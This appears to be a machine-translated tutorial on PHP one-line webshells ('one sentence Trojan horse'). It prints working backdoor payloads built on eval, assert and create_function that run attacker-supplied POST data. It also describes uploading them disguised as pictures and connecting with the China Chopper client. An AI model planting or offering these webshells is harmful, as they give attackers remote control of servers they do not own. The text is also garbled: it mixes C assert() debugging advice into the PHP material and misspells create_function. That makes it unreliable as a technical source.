PHP one sentence Trojan horse

In a word, the common form of Trojan horse

<?php eval(@$_POST['password']);?>

eval Is the execution function
$_POST[‘password’] It's the received data , What is used here is POST The way , It also exists GET、COOKIE The way , In a word, the Trojan horse passed eval Function takes the received data as PHP Code to execute

• Once used to pass pictures into the server , And connected with a kitchen knife , The password is required for the kitchen knife connection , What is used is the content in the parameter “password”.

• Problems were found during the connection , Connection time , Server side pop-up window , You need to close this window manually , The client can successfully connect with a kitchen knife . Otherwise, the connection will not succeed .（ The specific reason has not been solved , Take the time to solve this problem ）

Using functions

• assert function

<?php assert(@$_POST['password']);?>

assert Its function is to calculate the expression expression , If the value is false （ That is to say 0）, Then it goes first to stderr Print an error message , And then by calling abort To stop the program running .
assert() The disadvantage of , Frequent calls can greatly affect the performance of the program , Add extra expenses .

• Many places have assert Function disable , because assert Only in DEBUG Effective , Only need #include <assert.h> with #define NDEBUG Can be disabled , It can also be achieved by changing the environment .

• Better use in the program assert The place of ：

  • Null pointer check . for example , Null pointer checking for a function's parameters . You can use it like this ：
    assert (pointer != NULL);
    The resulting error will be like this ：
    Assertion ‘pointer != ((void *)0)’ failed.
    such , When a null pointer appears , Your program will exit , And give a good error message .
  • Check the value of function parameters . for example , If a function can only be in one of its parameters foo Is called when it is positive , You can write this at the beginning of the function :
    assert (foo > 0);,
    This will help you detect incorrect use of functions , This also gives the source code reader a very clear impression , That is, there are restrictions on the parameter values of the function .

We can try to use it reasonably in our own Trojan horse .

• create_funtion function

<?php
$fun = create_funtion('',$_POST['password']);
$fun();
?>

create_funtion The function creates an anonymous function based on the parameters passed , And return a unique name for it .
Usage method ： Generate a function from the data passed by the user , For example, the above fun(), And then execute fun().

• The following code reference

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?>

create_function() Will create an anonymous function （lambda style ）. Here we have created a file called lambda_1 Function of , At the first echo The name appears in the , And in the second echo Statement executed this function .
create_function() The function will execute internally eval(), We found out that the latter return sentence , Belong to create_function() Second parameter in string $code Location .